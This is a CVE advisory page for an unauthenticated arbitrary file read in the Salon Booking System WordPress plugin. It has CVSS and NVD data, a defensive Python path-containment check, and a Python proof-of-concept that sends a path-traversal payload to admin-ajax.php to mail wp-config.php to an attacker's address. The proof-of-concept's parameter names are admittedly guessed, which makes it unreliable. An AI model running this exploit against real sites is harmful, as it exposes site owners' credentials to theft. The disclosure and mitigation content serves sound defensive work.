Security Vulnerability Report
CVE-2026-6320 CVSS 7.5 HIGH

CVE-2026-6320

Published: 2026-05-02 12:16:17
Last Modified: 2026-05-05 19:15:34

Description

The Salon Booking System – Free Version plugin for WordPress is vulnerable to Arbitrary File Read in versions up to, and including, 10.30.25. This is due to the public booking flow accepting attacker-controlled file-field values and later using those stored values as trusted paths for email attachments. This makes it possible for unauthenticated attackers to read arbitrary local files and exfiltrate them via booking confirmation email attachments.
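The root cause described above is a stored file-field value being trusted as an attachment path. The check below is an added illustration written for this page, not the plugin's own code: it resolves each stored value against the uploads directory and refuses anything that escapes it (traversal, absolute paths, symlinks pointing outside) before the value reaches the mailer. The directory layout, file names and the `resolve_attachment`/`build_attachment_list` functions are constructed for the demonstration.

```python
import os
import tempfile


def resolve_attachment(uploads_dir: str, stored_value: str):
    """Map a stored file-field value to a file inside uploads_dir.

    Returns the resolved absolute path, or None when the value is empty,
    escapes the uploads directory (../, absolute paths, symlinks pointing
    out of it), or does not name a regular file. Nothing is attached on None.
    """
    if not stored_value:
        return None
    base = os.path.realpath(uploads_dir)
    # os.path.join discards base when stored_value is absolute; realpath then
    # collapses any ../ and follows symlinks, so the containment check below
    # sees the file that would actually be read by the mailer.
    candidate = os.path.realpath(os.path.join(base, stored_value))
    try:
        contained = os.path.commonpath([base, candidate]) == base
    except ValueError:  # paths on different drives (Windows): never contained
        contained = False
    if not contained or not os.path.isfile(candidate):
        return None
    return candidate


def build_attachment_list(uploads_dir: str, stored_values):
    """Split a booking's stored file-field values into safe attachment paths
    and rejected raw values, so rejections can be logged as a detection signal."""
    accepted, rejected = [], []
    for value in stored_values:
        path = resolve_attachment(uploads_dir, value)
        if path:
            accepted.append(path)
        else:
            rejected.append(value)
    return accepted, rejected


def demo():
    """Constructed scenario (hypothetical layout): an uploads directory holding
    one legitimate upload, with a sensitive file one level above it."""
    root = tempfile.mkdtemp()
    uploads = os.path.join(root, "uploads")
    os.mkdir(uploads)
    with open(os.path.join(uploads, "invoice.pdf"), "w") as f:
        f.write("legitimate upload")
    with open(os.path.join(root, "wp-config.php"), "w") as f:
        f.write("<?php // sensitive, must never be attached")
    stored_values = [
        "invoice.pdf",                          # legitimate relative name
        "../wp-config.php",                     # traversal out of uploads
        os.path.join(root, "wp-config.php"),    # absolute path
        "",                                     # empty field
        "missing.pdf",                          # not a regular file
    ]
    return build_attachment_list(uploads, stored_values)


if __name__ == "__main__":
    ok, bad = demo()
    print("attach:", ok)
    print("reject:", bad)
```

Only the first value survives; the other four are rejected and returned so the booking flow can log them, which is also the simplest place to alert on traversal attempts against this parameter.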

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

Salon Booking System <= 10.30.25

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
    import requests

    # Target URL (replace with actual target)
    target_url = "http://example.com/wp-admin/admin-ajax.php"

    # Attacker controlled email to receive the exfiltrated file
    attacker_email = "[email protected]"

    # Path traversal payload to read sensitive file
    # Payload attempts to read wp-config.php
    file_path_payload = "../../../../../../../../wp-config.php"

    # Data payload based on the vulnerable booking flow parameters
    # Note: Parameter names (e.g., 'action', 'booking_data') need to be confirmed via specific plugin analysis
    payload = {
        "action": "sbs_booking_submit",
        "sbs_email": attacker_email,
        "sbs_file_field": file_path_payload,  # The vulnerable parameter accepting the path
    }

    try:
        response = requests.post(target_url, data=payload)
        if response.status_code == 200:
            print("[+] Request sent successfully.")
            print("[+] Check the attacker's email inbox for the attachment containing the file content.")
        else:
            print("[-] Request failed.")
    except Exception as e:
        print(f"[-] An error occurred: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-6320", "sourceIdentifier": "[email protected]", "published": "2026-05-02T12:16:16.750", "lastModified": "2026-05-05T19:15:34.330", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Salon Booking System – Free Version plugin for WordPress is vulnerable to Arbitrary File Read in versions up to, and including, 10.30.25. This is due to the public booking flow accepting attacker-controlled file-field values and later using those stored values as trusted paths for email attachments. This makes it possible for unauthenticated attackers to read arbitrary local files and exfiltrate them via booking confirmation email attachments."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/changeset/3512110/salon-booking-system", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e91b8082-e1c7-4989-82db-20e255b52854?source=cve", "source": "[email protected]"}]}}